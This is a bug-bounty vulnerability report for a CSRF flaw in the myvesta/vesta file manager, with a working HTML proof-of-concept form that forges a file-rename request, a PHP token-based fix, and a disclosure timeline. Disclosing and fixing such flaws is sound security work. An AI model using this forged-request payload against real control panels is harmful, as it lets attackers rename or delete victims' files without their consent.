Cross-Site Request Forgery (CSRF) in myvesta/vesta

Valid

Reported on

Aug 24th 2021


✍️ Description

An attacker is able to rename any file on the server if a logged-in user visits the attacker's website.

πŸ•΅οΈβ€β™‚οΈ Proof of Concept

Create a test.txt file under /home/user. While logged in, open this PoC.html in a browser and submit the form; test.txt is renamed to test.php.


//PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<!-- no method attribute, so the form submits as a GET request; the browser attaches the victim's panel session cookie -->
<form action="https://demo.myvesta.com/file_manager/fm_api.php">
<input type="hidden" name="item" value="test&#46;php" />
<input type="hidden" name="target&#95;name" value="test&#46;txt" />
<input type="hidden" name="dir" value="&#47;home&#47;user&#47;" />
<input type="hidden" name="action" value="rename&#95;file" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

💥 Impact

This vulnerability makes it possible to forge a request on behalf of an admin or user and delete any file that user has access to.
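The root cause is that fm_api.php accepts a state-changing action from any page that can make the victim's browser send a request, with only the session cookie as proof of intent. The following is an added example of the standard fix, a synchronizer token plus method and origin checks; it is not myvesta/vesta code, and the function names (csrf_token, csrf_valid, same_origin) and the csrf_token form field are assumptions for illustration.

```php
<?php
// Added example (not myvesta/vesta code): synchronizer-token CSRF protection
// for a state-changing endpoint such as the file manager's rename action.
// Assumed: PHP sessions are in use and the legitimate file-manager page is
// served from the same origin, so it can embed the token. Names are hypothetical.

declare(strict_types=1);

// Issue (or reuse) a per-session CSRF token. It lives server-side in the
// session and is unpredictable, so an attacker's page cannot supply it.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Compare the submitted token with the session token in constant time.
function csrf_valid(?string $submitted): bool
{
    if ($submitted === null || $submitted === '' || empty($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// Defence in depth: a form submitted from another site carries an Origin
// (or Referer) header naming that site, not the panel's own host.
function same_origin(array $server, string $expectedHost): bool
{
    $src  = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = parse_url($src, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expectedHost) === 0;
}

// SameSite=Lax keeps the session cookie off cross-site POSTs (it is still
// sent on top-level GET navigations, which is why GET must not change state).
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);
session_start();

// Reject anything that is not a same-origin POST carrying a valid token.
if ($_SERVER['REQUEST_METHOD'] !== 'POST'
    || !same_origin($_SERVER, $_SERVER['SERVER_NAME'] ?? '')
    || !csrf_valid($_POST['csrf_token'] ?? null)) {
    http_response_code(403);
    exit('Forbidden: missing or invalid CSRF token');
}

// Only now dispatch $_POST['action'] (rename_file, delete, ...).
// The legitimate page embeds the token in its own form, e.g.:
//   <input type="hidden" name="csrf_token"
//          value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
```

Note the interaction with the PoC above: its form has no method attribute, so it submits a GET, and a SameSite=Lax cookie is still attached to a top-level GET navigation. Requiring POST for every state-changing action is therefore essential; the token then blocks forged POSTs, and the Origin/Referer check catches the case where a token is somehow leaked.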

💥 Test

Tested on Edge, Firefox, Chrome and Safari.

📍 Location

fm_api.php#L1

📍 References

csrf

We have contacted a member of the myvesta/vesta team and are waiting to hear back 2 years ago
Musio modified the report 2 years ago
myvesta validated this vulnerability 2 years ago
Musio has been awarded the disclosure bounty
The fix bounty is now up for grabs
myvesta marked this as fixed with commit 93de22 2 years ago
myvesta has been awarded the fix bounty
This vulnerability will not receive a CVE